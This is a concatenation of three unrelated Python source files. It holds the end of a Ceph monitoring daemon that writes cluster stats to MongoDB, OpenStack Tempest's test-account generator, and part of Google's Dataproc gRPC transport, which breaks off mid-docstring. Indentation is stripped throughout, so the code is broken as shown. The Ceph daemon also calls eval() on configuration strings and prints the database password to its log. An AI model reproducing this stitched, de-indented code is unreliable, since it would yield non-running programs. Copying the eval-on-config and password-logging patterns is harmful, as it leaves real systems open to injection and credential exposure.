"name": r["rule_name"],
"ruleset": r["ruleset"],
"type": r["type"],
"min_size": r["min_size"],
"max_size": r["max_size"],
"steps": steps
}
db.rules.update({'_id': rul["_id"]}, rul, upsert=True)
rules_ref.append(DBRef("rules", rul["_id"]))
tunables = crush_dump['output']['tunables']
crushmap = {"_id": fsid,
"types": types_ref,
"nodes": nodes_ref,
"rules": rules_ref,
"tunables": tunables
}
db.crushmap.update({'_id': crushmap["_id"]}, crushmap, upsert=True)
# uri : /api/v0.1/df
def process_df(restapi, ceph_rest_api_subfolder, db):
if not isLeader :
return
print str(datetime.datetime.now()), "-- Process DF"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder+"/api/v0.1/df.json")
r1=restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (DF) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(datetime.datetime.now()), "-- error (DF) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
else:
data1 = r1.read()
restapi.close()
df = json.loads(data1)
# cluster stat
clusterdf = df['output']['stats']
stats = clusterdf.copy()
stats["timestamp"] = int(round(time.time() * 1000))
stats["cluster"] = DBRef("cluster", fsid)
statsid = db.clusterstat.insert(stats)
db.cluster.update({'_id': fsid}, {"$set": {"df": DBRef("clusterstat", statsid)}})
# pool stat
pooldf = df['output']['pools']
for pdf in pooldf:
pstats = pdf["stats"].copy()
pstats["timestamp"] = int(round(time.time() * 1000))
pstats["pool"] = DBRef("pools", pdf["id"])
statsid = db.poolstat.insert(pstats)
db.pools.update({'_id': pdf["id"]}, {"$set": {"df": DBRef("poolstat", statsid)}})
# delete the oldest stats
def drop_stat(db, collection, window):
if not isLeader :
return
before = int((time.time() - window) * 1000)
print str(datetime.datetime.now()), "-- drop Stats :", collection, "before", before
db[collection].remove({"timestamp": {"$lt": before}})
def heart_beat(hostname, db):
beat = {"timestamp": int(round(time.time() * 1000)), }
db.cephprobe.update({'_id': hostname}, {"$set": beat}, upsert=True)
# leadership
leadership(db, hostname)
def ensure_dir(f):
d = os.path.dirname(f)
if not os.path.exists(d):
os.makedirs(d)
def get_local_mon_id(hostname, db):
monid = None
try :
monid = db.mon.find_one({"host.$id":hostname})["_id"]
except :
pass
return monid
class Repeater(Thread):
def __init__(self, event, function, args=[], period=5.0):
Thread.__init__(self)
self.stopped = event
self.period = period
self.function = function
self.args = args
def run(self):
while not self.stopped.wait(self.period):
try:
# call a function
self.function(*self.args)
except Exception, e:
# try later
try:
print str(datetime.datetime.now()), "-- WARNING : "+self.function.__name__ + " did not work : ", e
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
pass
except:
pass
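# Illustrative usage of Repeater (a sketch; see start_probe below for the real calls):
#   t = Repeater(evt, heart_beat, [hostname, db], period=5.0)
#   t.start()   # calls heart_beat(hostname, db) every 5 seconds until evt is set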
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
evt = Event()
def handler(signum, frame):
print 'Signal handler called with signal', signum
evt.set()
class CephProbeDaemon(Daemon):
def __init__(self, pidfile):
Daemon.__init__(self, pidfile, stdout=logfile, stderr=logfile)
def run(self):
self.start_probe()
@staticmethod
def start_probe():
print str(datetime.datetime.now()), "-- CephProbe loading"
# load conf
conf = load_conf()
global clusterName
global fsid
global ceph_version
global isLeader
global hb_refresh
ceph_version = get_ceph_version()
isLeader = False
clusterName = conf.get("cluster", "ceph")
print "clusterName = ", clusterName
print "ceph_version = ", ceph_version
ceph_version_major = int(ceph_version.split('.')[0]) if ceph_version.split('.')[0].isdigit() else 0  # numeric so the Luminous check below compares correctly
ceph_conf_file = conf.get("ceph_conf", "/etc/ceph/ceph.conf")
print "ceph_conf = ", ceph_conf_file
ceph_rest_api = conf.get("ceph_rest_api", '127.0.0.1:5000')
print "ceph_rest_api = ", ceph_rest_api
ceph_rest_api_subfolder = conf.get("ceph_rest_api_subfolder", '')
if ceph_rest_api_subfolder!= '' and not ceph_rest_api_subfolder.startswith('/'):
ceph_rest_api_subfolder = '/' + ceph_rest_api_subfolder
print "ceph_rest_api_subfolder = ", ceph_rest_api_subfolder
fsid = ceph_conf_global(ceph_conf_file, 'fsid')
print "fsid = ", fsid
hb_refresh = conf.get("hb_refresh", 5)
print "hb_refresh = ", hb_refresh
status_refresh = conf.get("status_refresh", 3)
print "status_refresh = ", status_refresh
osd_dump_refresh = conf.get("osd_dump_refresh", 3)
print "osd_dump_refresh = ", osd_dump_refresh
pg_dump_refresh = conf.get("pg_dump_refresh", 60)
print "pg_dump_refresh = ", pg_dump_refresh
crushmap_refresh = conf.get("crushmap_refresh", 60)
print "crushmap_refresh = ", crushmap_refresh
df_refresh = conf.get("df_refresh", 60)
print "df_refresh = ", df_refresh
cluster_window = conf.get("cluster_window", 1200)
print "cluster_window = ", cluster_window
osd_window = conf.get("osd_window", 1200)
print "osd_window = ", osd_window
pool_window = conf.get("pool_window", 1200)
print "pool_window = ", pool_window
mongodb_host = conf.get("mongodb_host", None)
print "mongodb_host = ", mongodb_host
mongodb_port = conf.get("mongodb_port", None)
print "mongodb_port = ", mongodb_port
is_mongo_replicat = conf.get("is_mongo_replicat", 0)
print "is_mongo_replicat = ", is_mongo_replicat
mongodb_set = "'"+conf.get("mongodb_set", "")+"'"
print "mongodb_set = ", mongodb_set
mongodb_replicaSet =conf.get("mongodb_replicaSet", None)
print "mongodb_replicaSet = ",mongodb_replicaSet
mongodb_read_preference = conf.get("mongodb_read_preference", None)
print "mongodb_read_preference = ", mongodb_read_preference
is_mongo_authenticate = conf.get("is_mongo_authenticate", 0)
print "is_mongo_authenticate",is_mongo_authenticate
mongodb_user = conf.get("mongodb_user", "cephdefault")
print "mongodb_user = ", mongodb_user
mongodb_passwd = conf.get("mongodb_passwd", None)
print "mongodb_passwd = ", mongodb_passwd
sys.stdout.flush()
# end conf extraction
#hostname = socket.gethostname() #platform.node()
hostname = socket.getfqdn()
# take care with mongo set and authentication
if is_mongo_replicat == 1:
print "replica set connection"
client = MongoReplicaSetClient(eval(mongodb_set), replicaSet=mongodb_replicaSet, read_preference=eval(mongodb_read_preference))
else:
print "no replica set"
client = MongoClient(mongodb_host, mongodb_port)
db = client[fsid]
if is_mongo_authenticate == 1:
print "authentication to database"
db.authenticate(mongodb_user, mongodb_passwd)
else:
print "no authentication"
sys.stdout.flush()
restapi = httplib.HTTPConnection(ceph_rest_api)
init_cluster(restapi, ceph_rest_api_subfolder, db, hostname)
db.cephprobe.update({'_id': hostname}, {"$set": conf}, upsert=True)
conf["_id"] = hostname
#db.cephprobe.remove({'_id': hostname})
#db.cephprobe.insert(conf)
hb_thread = None
if hb_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
hb_thread = Repeater(evt, heart_beat, [hostname, db], hb_refresh)
hb_thread.start()
status_thread = None
if status_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
status_thread = Repeater(evt, process_status, [restapi, ceph_rest_api_subfolder, db], status_refresh)
status_thread.start()
osd_dump_thread = None
if osd_dump_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
osd_dump_thread = Repeater(evt, process_osd_dump, [restapi, ceph_rest_api_subfolder, db], osd_dump_refresh)
osd_dump_thread.start()
# uses the same refresh period and parameters as osd_dump
osd_df_thread = None
if osd_dump_refresh > 0 and ceph_version_major>=12: # Luminous
restapi = httplib.HTTPConnection(ceph_rest_api)
osd_df_thread = Repeater(evt, process_osd_df, [restapi, ceph_rest_api_subfolder, db], osd_dump_refresh)
osd_df_thread.start()
pg_dump_thread = None
if pg_dump_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
pg_dump_thread = Repeater(evt, process_pg_dump, [restapi, ceph_rest_api_subfolder, db], pg_dump_refresh)
pg_dump_thread.start()
crushmap_thread = None
if crushmap_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
crushmap_thread = Repeater(evt, process_crushmap, [restapi, ceph_rest_api_subfolder, db], crushmap_refresh)
crushmap_thread.start()
df_thread = None
if df_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
df_thread = Repeater(evt, process_df, [restapi, ceph_rest_api_subfolder, db], df_refresh)
df_thread.start()
# drop threads : osdstat, poolstat, clusterstat, osddf
cluster_db_drop_thread = None
if cluster_window > 0:
cluster_db_drop_thread = Repeater(evt, drop_stat, [db, "clusterstat", cluster_window], cluster_window)
cluster_db_drop_thread.start()
osd_db_drop_thread = None
if osd_window > 0:
osd_db_drop_thread = Repeater(evt, drop_stat, [db, "osdstat", osd_window], osd_window)
osd_db_drop_thread.start()
pool_db_drop_thread = None
if pool_window > 0:
pool_db_drop_thread = Repeater(evt, drop_stat, [db, "poolstat", pool_window], pool_window)
pool_db_drop_thread.start()
osddf_db_drop_thread = None
if osd_window > 0:
osddf_db_drop_thread = Repeater(evt, drop_stat, [db, "osddf", osd_window], osd_window)
osddf_db_drop_thread.start()
signal.signal(signal.SIGTERM, handler)
while not evt.isSet():
evt.wait(600)
print str(datetime.datetime.now()), "-- CephProbe stopped"
sys.stdout.flush()
if __name__ == "__main__":
ensure_dir(logfile)
ensure_dir(runfile)
daemon = CephProbeDaemon(runfile)
if len(sys.argv) == 2:
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'status' == sys.argv[1]:
daemon.status()
elif 'restart' == sys.argv[1]:
daemon.restart()
elif 'nodaemon' == sys.argv[1]:
CephProbeDaemon.start_probe()
else:
print "Unknown command"
sys.exit(2)
sys.exit(0)
else:
print "usage: %s start|stop|restart|status|nodaemon" % sys.argv[0]
sys.exit(2)
|
|
#!/usr/bin/env python
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility for creating **accounts.yaml** file for concurrent test runs.
Creates one primary user, one alt user, one swift admin, one stack owner
and one admin (optionally) for each concurrent thread. The utility creates
a user for each tenant. The **accounts.yaml** file will be valid and contain
credentials for the created users, so each user will be in a separate tenant and
have a username, tenant_name, password and roles.
**Usage:** ``tempest account-generator [-h] [OPTIONS] accounts_file.yaml``.
Positional Arguments
--------------------
**accounts_file.yaml** (Required) Provide an output accounts yaml file. Utility
creates a .yaml file in the directory where the command is run. The appropriate
name for the file is *accounts.yaml* and it should be placed in *tempest/etc*
directory.
Authentication
--------------
Account generator creates users and tenants so it needs the admin credentials
of your cloud to operate properly. The corresponding info can be given either
through CLI options or environment variables.
You're probably familiar with these, but just as a reminder:
======== ======================== ====================
Param CLI Environment Variable
======== ======================== ====================
Username --os-username OS_USERNAME
Password --os-password OS_PASSWORD
Project --os-project-name OS_PROJECT_NAME
Tenant --os-tenant-name (depr.) OS_TENANT_NAME
Domain --os-domain-name OS_DOMAIN_NAME
======== ======================== ====================
Optional Arguments
------------------
**-h**, **--help** (Optional) Shows help message with the description of
utility and its arguments, and exits.
**-c /etc/tempest.conf**, **--config-file /etc/tempest.conf** (Optional) Path to
tempest config file.
**--os-username <auth-user-name>** (Optional) Name used for authentication with
the OpenStack Identity service. Defaults to env[OS_USERNAME]. Note: User should
have permissions to create new user accounts and tenants.
**--os-password <auth-password>** (Optional) Password used for authentication
with the OpenStack Identity service. Defaults to env[OS_PASSWORD].
**--os-project-name <auth-project-name>** (Optional) Project to request
authorization on. Defaults to env[OS_PROJECT_NAME].
**--os-tenant-name <auth-tenant-name>** (Optional, deprecated) Tenant to
request authorization on. Defaults to env[OS_TENANT_NAME].
**--os-domain-name <auth-domain-name>** (Optional) Domain the user and project
belong to. Defaults to env[OS_DOMAIN_NAME].
**--tag TAG** (Optional) Resources tag. Each created resource (user, project)
will have its name prefixed with the given TAG. Using a tag is recommended
to make later identification and cleanup of resources easier.
**-r CONCURRENCY**, **--concurrency CONCURRENCY** (Optional) Concurrency count
(default: 1). The number of accounts required can be estimated as
CONCURRENCY x 2. Each user provided in the *accounts.yaml* file will be in
a different tenant. This is required to provide isolation between tests
running in parallel.
**--with-admin** (Optional) Creates admin for each concurrent group
(default: False).
**-i VERSION**, **--identity-version VERSION** (Optional) Provisions accounts
using the specified version of the identity API. (default: '3').
To see help on specific argument, please do: ``tempest account-generator
[OPTIONS] <accounts_file.yaml> -h``.
"""
import argparse
import os
import traceback
from cliff import command
from oslo_log import log as logging
import yaml
from tempest.common import credentials_factory
from tempest.common import dynamic_creds
from tempest import config
LOG = None
CONF = config.CONF
DESCRIPTION = ('Create accounts.yaml file for concurrent test runs.%s'
'One primary user, one alt user, '
'one swift admin, one stack owner '
'and one admin (optionally) will be created '
'for each concurrent thread.' % os.linesep)
def setup_logging():
global LOG
logging.setup(CONF, __name__)
LOG = logging.getLogger(__name__)
def get_credential_provider(opts):
identity_version = "".join(['v', str(opts.identity_version)])
# NOTE(andreaf) For now tempest.conf controls whether resources will
# actually be created. Once we remove the dependency from tempest.conf
# we will need extra CLI option(s) to control this.
network_resources = {'router': True,
'network': True,
'subnet': True,
'dhcp': True}
admin_creds_dict = {'username': opts.os_username,
'password': opts.os_password}
_project_name = opts.os_project_name or opts.os_tenant_name
if opts.identity_version == 3:
admin_creds_dict['project_name'] = _project_name
admin_creds_dict['domain_name'] = opts.os_domain_name or 'Default'
elif opts.identity_version == 2:
admin_creds_dict['tenant_name'] = _project_name
admin_creds = credentials_factory.get_credentials(
fill_in=False, identity_version=identity_version, **admin_creds_dict)
return dynamic_creds.DynamicCredentialProvider(
identity_version=identity_version,
name=opts.tag,
network_resources=network_resources,
neutron_available=CONF.service_available.neutron,
create_networks=CONF.auth.create_isolated_networks,
identity_admin_role=CONF.identity.admin_role,
identity_admin_domain_scope=CONF.identity.admin_domain_scope,
project_network_cidr=CONF.network.project_network_cidr,
project_network_mask_bits=CONF.network.project_network_mask_bits,
public_network_id=CONF.network.public_network_id,
admin_creds=admin_creds,
**credentials_factory.get_dynamic_provider_params())
def generate_resources(cred_provider, admin):
# Create the list of resources to be provisioned for each process
# NOTE(andreaf) get_credentials expects a string for types or a list for
# roles. Adding all required inputs to the spec list.
spec = ['primary', 'alt']
if CONF.service_available.swift:
spec.append([CONF.object_storage.operator_role])
spec.append([CONF.object_storage.reseller_admin_role])
if CONF.service_available.heat:
spec.append([CONF.orchestration.stack_owner_role,
CONF.object_storage.operator_role])
if admin:
spec.append('admin')
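    # For illustration: with swift and heat available and admin=True, spec
    # ends up like ['primary', 'alt', [<operator_role>], [<reseller_admin_role>],
    # [<stack_owner_role>, <operator_role>], 'admin'], where the role names
    # come from the deployment's configuration.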
resources = []
for cred_type in spec:
resources.append((cred_type, cred_provider.get_credentials(
credential_type=cred_type)))
return resources
def dump_accounts(resources, identity_version, account_file):
accounts = []
for resource in resources:
cred_type, test_resource = resource
account = {
'username': test_resource.username,
'password': test_resource.password
}
if identity_version == 3:
account['project_name'] = test_resource.project_name
account['domain_name'] = test_resource.domain_name
else:
account['project_name'] = test_resource.tenant_name
        # If the spec entry is 'admin', credentials are defined via type;
        # otherwise they are defined via a list of roles.
if cred_type == 'admin':
account['types'] = [cred_type]
elif cred_type not in ['primary', 'alt']:
account['roles'] = cred_type
        if test_resource.network:
            account['resources'] = {}
            account['resources']['network'] = test_resource.network['name']
accounts.append(account)
if os.path.exists(account_file):
os.rename(account_file, '.'.join((account_file, 'bak')))
with open(account_file, 'w') as f:
yaml.safe_dump(accounts, f, default_flow_style=False)
    LOG.info('%s generated successfully!', account_file)
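# The generated accounts file is a YAML list of dicts, roughly (values shown
# are illustrative):
#   - username: tempest-user-1
#     password: secret
#     project_name: tempest-project-1
#     domain_name: Default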
def _parser_add_args(parser):
parser.add_argument('-c', '--config-file',
metavar='/etc/tempest.conf',
help='path to tempest config file')
parser.add_argument('--os-username',
metavar='<auth-user-name>',
default=os.environ.get('OS_USERNAME'),
help='User should have permissions '
'to create new user accounts and '
'tenants. Defaults to env[OS_USERNAME].')
parser.add_argument('--os-password',
metavar='<auth-password>',
default=os.environ.get('OS_PASSWORD'),
help='Defaults to env[OS_PASSWORD].')
parser.add_argument('--os-project-name',
metavar='<auth-project-name>',
default=os.environ.get('OS_PROJECT_NAME'),
help='Defaults to env[OS_PROJECT_NAME].')
parser.add_argument('--os-tenant-name',
metavar='<auth-tenant-name>',
default=os.environ.get('OS_TENANT_NAME'),
help='Defaults to env[OS_TENANT_NAME].')
parser.add_argument('--os-domain-name',
metavar='<auth-domain-name>',
default=os.environ.get('OS_DOMAIN_NAME'),
help='Defaults to env[OS_DOMAIN_NAME].')
parser.add_argument('--tag',
default='',
required=False,
dest='tag',
help='Resources tag')
parser.add_argument('-r', '--concurrency',
default=1,
type=int,
required=False,
dest='concurrency',
help='Concurrency count')
parser.add_argument('--with-admin',
action='store_true',
dest='admin',
help='Creates admin for each concurrent group')
parser.add_argument('-i', '--identity-version',
default=3,
choices=[2, 3],
type=int,
required=False,
dest='identity_version',
help='Version of the Identity API to use')
parser.add_argument('accounts',
metavar='accounts_file.yaml',
help='Output accounts yaml file')
def get_options():
usage_string = ('tempest account-generator [-h] <ARG> ...\n\n'
'To see help on specific argument, do:\n'
'tempest account-generator <ARG> -h')
parser = argparse.ArgumentParser(
description=DESCRIPTION,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
usage=usage_string
)
_parser_add_args(parser)
opts = parser.parse_args()
return opts
class TempestAccountGenerator(command.Command):
def get_parser(self, prog_name):
parser = super(TempestAccountGenerator, self).get_parser(prog_name)
_parser_add_args(parser)
return parser
def take_action(self, parsed_args):
try:
main(parsed_args)
except Exception:
LOG.exception("Failure generating test accounts.")
traceback.print_exc()
raise
def get_description(self):
return DESCRIPTION
def main(opts=None):
setup_logging()
if not opts:
LOG.warning("Use of: 'tempest-account-generator' is deprecated, "
"please use: 'tempest account-generator'")
opts = get_options()
if opts.config_file:
config.CONF.set_config_path(opts.config_file)
if opts.os_tenant_name:
LOG.warning("'os-tenant-name' and 'OS_TENANT_NAME' are both "
"deprecated, please use 'os-project-name' or "
"'OS_PROJECT_NAME' instead")
resources = []
for count in range(opts.concurrency):
# Use N different cred_providers to obtain different sets of creds
cred_provider = get_credential_provider(opts)
resources.extend(generate_resources(cred_provider, opts.admin))
dump_accounts(resources, opts.identity_version, opts.accounts)
if __name__ == "__main__":
main()
|
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import grpc_helpers
from google.api_core import operations_v1
from google.api_core import gapic_v1
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.cloud.dataproc_v1.types import clusters
from google.longrunning import operations_pb2 # type: ignore
from .base import ClusterControllerTransport, DEFAULT_CLIENT_INFO
class ClusterControllerGrpcTransport(ClusterControllerTransport):
"""gRPC backend transport for ClusterController.
The ClusterControllerService provides methods to manage
clusters of Compute Engine instances.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_stubs: Dict[str, Callable]
def __init__(
self,
*,
host: str = "dataproc.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client: Optional[operations_v1.OperationsClient] = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
# use the credentials which are saved
credentials=self._credentials,
# Set ``credentials_file`` to ``None`` here as
# the credentials that we saved earlier should be used.
credentials_file=None,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@classmethod
def create_channel(
cls,
host: str = "dataproc.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
Raises:
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Quick check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsClient(self.grpc_channel)
# Return the client from cache.
return self._operations_client
@property
def create_cluster(
self,
) -> Callable[[clusters.CreateClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the create cluster method over gRPC.
Creates a cluster in a project. The returned
[Operation.metadata][google.longrunning.Operation.metadata] will
be
`ClusterOperationMetadata <https://cloud.google.com/dataproc/docs/reference/rpc/google.cloud.dataproc.v1#clusteroperationmetadata>`__.
Returns:
Callable[[~.CreateClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "create_cluster" not in self._stubs:
self._stubs["create_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/CreateCluster",
request_serializer=clusters.CreateClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["create_cluster"]
@property
def update_cluster(
self,
) -> Callable[[clusters.UpdateClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the update cluster method over gRPC.
Updates a cluster in a project. The returned
[Operation.metadata][google.longrunning.Operation.metadata] will
be
`ClusterOperationMetadata <https://cloud.google.com/dataproc/docs/reference/rpc/google.cloud.dataproc.v1#clusteroperationmetadata>`__.
The cluster must be in a
[``RUNNING``][google.cloud.dataproc.v1.ClusterStatus.State]
state or an error is returned.
Returns:
Callable[[~.UpdateClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "update_cluster" not in self._stubs:
self._stubs["update_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/UpdateCluster",
request_serializer=clusters.UpdateClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["update_cluster"]
@property
def stop_cluster(
self,
) -> Callable[[clusters.StopClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the stop cluster method over gRPC.
Stops a cluster in a project.
Returns:
Callable[[~.StopClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "stop_cluster" not in self._stubs:
self._stubs["stop_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/StopCluster",
request_serializer=clusters.StopClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["stop_cluster"]
@property
def start_cluster(
self,
) -> Callable[[clusters.StartClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the start cluster method over gRPC.
Starts a cluster in a project.
Returns:
Callable[[~.StartClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "start_cluster" not in self._stubs:
self._stubs["start_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/StartCluster",
request_serializer=clusters.StartClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["start_cluster"]
@property
def delete_cluster(
self,
) -> Callable[[clusters.DeleteClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the delete cluster method over gRPC.
Deletes a cluster in a project. The returned
[Operation.metadata][google.longrunning.Operation.metadata] will
be
`ClusterOperationMetadata <https://cloud.google.com/dataproc/docs/reference/rpc/google.cloud.dataproc.v1#clusteroperationmetadata>`__.
Returns:
Callable[[~.DeleteClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "delete_cluster" not in self._stubs:
self._stubs["delete_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/DeleteCluster",
request_serializer=clusters.DeleteClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["delete_cluster"]
@property
def get_cluster(self) -> Callable[[clusters.GetClusterRequest], clusters.Cluster]:
r"""Return a callable for the get cluster method over gRPC.
Gets the resource representation for a cluster in a
project.
Returns:
